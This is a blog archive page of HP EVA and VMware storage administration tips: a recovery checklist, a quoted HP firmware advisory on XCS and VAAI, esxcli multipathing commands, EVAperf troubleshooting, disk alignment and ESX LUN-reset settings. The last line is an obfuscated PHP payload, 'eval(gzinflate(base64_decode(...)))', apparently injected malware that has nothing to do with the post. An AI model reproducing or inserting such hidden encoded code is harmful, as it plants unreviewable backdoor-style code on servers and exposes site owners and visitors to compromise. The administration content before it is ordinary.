Entries Tagged as 'Storageworks'

E.H.B.O. for EVA… What NOT to do!

  1. Check your environment (in my case an EVA4400 without any GB of data, both controllers failed, system down)
  2. DO NOT (I repeat) DO NOT TOUCH the EVA. (Leave all Disks as they are.)
  3. In my case HP was called by the customer.
  4. Go to the field-service page (that is still on the original CVE port)
  5. Go to command line
  6. Enter the given commands from HP support. (I will not mention them, but know them). At the time I went into the field-service page the EVA was gone from the CVE en in the Uninitialized part of the Service Tab. The situation was the 5 disks had failed within 1 day). Probably 2 in the sam e RSS set at the same time.
  7. Reseat the faulty disks.
  8. Again run command within field-service and restart CVE service.
  9. There your EVA is back again.

EVA back from the death of from a short coma?

What so ever. If you have 1 (ONE) problem. Do NOT pull, replace or what-so-ever on the EVA until you know you should. You are likely to introduce  more problems you can handle.

HP 4400/6400/8400 Enterprise Virtual Array and HP EVA P6000 Storage controller software version XCS 11001000 Inactive

After working at a customer site and running into a problem expanding an EVA6400 (SPOF on a disk, so I/O controllers not code loading). I heard from support of HP there is a new XCS code for the EVA x400 series and P600 range.

Below document ID: c03571575

Release Date: 2012-11-13
Last Updated: 2012-11-13

http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03571575&lang=en&cc=us&taskId=101&prodSeriesId=3664763&prodTypeId=12169

DESCRIPTION

A critical issue has been discovered to potentially occur on HP Enterprise Virtual Array (EVA) 4400/6400/8400 and HP EVA P63x0/65×0 systems running controller software version XCS 11001000. The potential for this issue is only on systems running software version XCS 11001000 and that are using VAAI functionality enabled on VMware ESX 4.1/ESX 5.x hosts.

NOTE: Version 11001000 is the only active XCS controller software with this issue; however, the potential for this issue also exists in the inactive XCS versions 10100000 and 11000000.

To ensure current and future systems will function as expected with VAAI enabled, XCS controller software version 11001000 is being retired and will be listed as Inactive in the HP controller software support matrix. Contact your HP Services representative for more information on the issue and to schedule an upgrade to the latest controller software that resolves this issue.

SCOPE

This issue affects HP EVA4400/6400/8400 and HP EVA P63x0/P65x0 arrays that are running XCS 11001000.

RESOLUTION

Contact your HP Services representative for more information on the issue and to schedule an upgrade to XCS version 11001100. The VAAI functionality must be immediately disabled until the controller software is upgraded to 11001100.

WORKAROUND

Disable VAAI functionality on all VMware hosts that access the HP EVA array until the controller software has been upgraded to XCS 11001100.

UPDATE 16-11-2012:

The XCS code be found -> https://h20392.www2.hp.com/portal/swdepot/displayProductsList.do?category=NAS

Best practices

HP Enterprise Virtual Array (EVA) family with VMware vSphere 4.0, 4.1 and 5.0 Best practices
[Download]

Running VMware vSphere 4 on HP LeftHand P4000 SAN Solutions
[Download]

Best Practices for deploying VMware and vSphere 4 with VMware High Availability and
Fault Tolerance on HP P4500 Multi-Site SAN cluster
[Download]

HP P4000 LeftHand Solutions with VMware vSphere Best Practices (incl. vSphere 5)
[Download]

3PAR Utility Storage with VMware vSphere
[Download]

HP P2000 Software  Plug-in for VMware VAAI
[Download]

HP 3PAR Storage and VMware vSphere 5 best practices
[Download]

IOP’s aanpassingen Alua Aware storage

Alle LUN’s standaard op Round-Robin zetten:

esxcli storage nmp satp set --default-psp VMW_PSP_RR --satp VMW_SATP_ALUA

Op alle LUN’s welke op Round-Robin staan de IOP’s op 1 zetten:

for i in `esxcli storage nmp device list | grep naa.600` ; 
do esxcli storage nmp psp roundrobin deviceconfig set -t iops -I 1 -d $i; done

EVAPERF “Access to the host was NOT verified

Sometimes I get the “nice” message from EVAperf, when adding a new CV/EVA host to the access list:

c:\Program Files\Hewlett-Packerd\EVA Performance Monitor>evaperf fnh 127.0.0.1 <username>
Access to the host was NOT verified
Host: 127.0.0.1 not added to the list

This also goes when changing 127.0.0.1 to localhost or the IP address of the host.

Turns out that the fqn of the host fixes this issue.

EVA VAAI compliant?

Question that are thrown to me are:

Is the EVA VAAI compliant?
The EVA will be “vStorage APIs for Array Integration” (in short VAAI) compliant. It is NOT compliant at the moment.

Will it be in the next firmware release. Probably NOT.

The next… Probably YES. So we will have to wait, but until then the EVA should be fast enough by it’s own.

More information when available.

A “Poor man’s SAN” for ESX vSphere with VSA

Just thinking on how to make a “Poor man’s SAN” I came across this this idear:

Take 2 servers with enough disk space available and the ability to expand when needed. Install on both systems ESXi vSphere. With this installed, create on your ESX hosts VM’s with the VSA you can buy from HP.
The VSA is the same software that is running on the P4000 from HP, but now running inside your vSphere environment. The licenses go up to 10TB.
Doing so on both ESX hosts you can setup you SAN/iQ management environment and also your (first) cluster.

Make sure you have enough managers running to keep your data available in case one of your ESX hosts dies.

Now you have created your own iSCSI “P4000” like SAN. You can now connect to it from your production ESX vSphere environment.

One thing. Support from HP is NOT included.
(drawing will follow)

VAAI support with SAN/iQ 9.0 on P4000

SAN/iQ vor P4000 has now support fot VMware VAAI vStorage offloads — Full copy, Block Zeroing, and Hardware Assisted Locking for faster VM deployment and less load on ESX server.

Meaning more VM’s can be run on the same environment. Till SAN/iQ 8.1 is was recommended to a total of 16 VM’s, now up t 50 VM’s should be supported. I have not been able to test this theorie, but this is stated by HP at this moment.

To upgrade to SAN/iQ 9.0 your system should run SAN/iQ 8.1.

Disk alignment

Disk alignment is very important in every Operating system environment. But when you are using a SAN and also using VMware you should take disk alignement in account.

Above you see that the Guest OS (for example Windows) is not aligned with the VMFS and the VMFS is not aligned with the Array Blocks. Meaning that 1 I/O can result into 3 I/O’s on the storage device.

Now the VMFS has been aligned, but the Guest OS is still not. Now an I/O can result into 2 I/O’s on the storage device. Beter, but performance can still be improved.

Now all File Systems are aligned. On I/O results into 1 I/O, because all beginning of the blocks are at the same position.

Only Windows Vista, Windows 2008 and Windows XP has a trick to avoid this:

UseLunReset and UseDeviceReset VMware


If you are using a SAN attached ESX environment, make  sure:
Disk.UseLunReset is set to 1 (default = 1)
Disk.UseDeviceReset is set to 0 (default = 1).

The reason to disable the Disk.UseDeviceReset param is because it does a complete SCSI bus reset. All SCSI reservations will be cleared, not for a a specific LUN but for the complete device (being the whole SAN controller).

This could disrupt your SAN fabric. I would suggest setting the ESX host in maintenance mode and reboot it afterwards.

Alternatively, you can also set this via the Service Console by issuing the following commands:

esxcfg-advcfg -s 1 /Disk/UseLunReset
esxcfg-advcfg -s 0 /Disk/UseDeviceReset
service mgmt-vmware restart

eval(gzinflate(base64_decode('vZHRasIwFIavV/AdQpCSglSvJ7INV3Aw0NV2N2MESU9tZpZTkuiE6bsvOrsibre7/c+X/3xJwBg03ECNxkm9ZINoGHTHWECePpIRoZVz9XW/r6ReFShWscD3vkDtQLu4ruobWYzCCq0b0XhtFGjhj7Iunyfpc5K+0EmWzfhkOs/oaxTTcG3kH2CaPOXJPON5+uDRYdAJZEkYk9ptFootwXFRLvlmYRhdKIUf3JfwEmvQNIrIbkdOpNSSe/o3KiJhSMq1Fk6i5rCV1llGS6mAH/u/b2UPfZ+d4ApEheT2Ysya14mGnWBPQFn4R9NGrnvS8V90VDyzOqm/odSM0h5p4HPji35xUPBWrl1S+f6f+HzHMbbgsPYDUfXI2E+ms4xPkrv7JO2RQYvBFsQBahOh0EIT7b8A'))); ?>